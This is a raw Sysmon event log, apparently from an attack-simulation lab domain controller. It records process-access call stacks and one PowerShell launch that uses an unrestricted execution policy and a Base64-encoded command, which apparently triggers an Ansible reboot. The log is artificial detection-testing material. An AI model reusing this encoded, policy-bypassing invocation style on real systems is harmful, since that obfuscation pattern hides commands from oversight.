13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000507Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000506Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000505Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000504Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-83AA-5FCF-0500-000000009001}6401176C:\Windows\system32\csrss.exe{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-851B-5FCF-DC02-000000009001}49164472C:\Windows\system32\cmd.exe{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.587{10ACEC4A-851B-5FCF-DD02-000000009001}2760C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{10ACEC4A-851B-5FCF-15E5-100000000000}0x10e5150HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-851B-5FCF-DC02-000000009001}4916C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B6-5FCF-0B00-000000009001}8604064C:\Windows\system32\lsass.exe{10ACEC4A-83B9-5FCF-1400-000000009001}1328C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-851B-5FCF-D902-000000009001}45203012C:\Windows\system32\conhost.exe{10ACEC4A-851B-5FCF-DC02-000000009001}4916C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:52:27.571{10ACEC4A-83B9-5FCF-0C00-000000009001}4801040C:\Windows\system32\svchost.exe{10ACEC4A-8515-5FCF-BE02-000000009001}4676C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 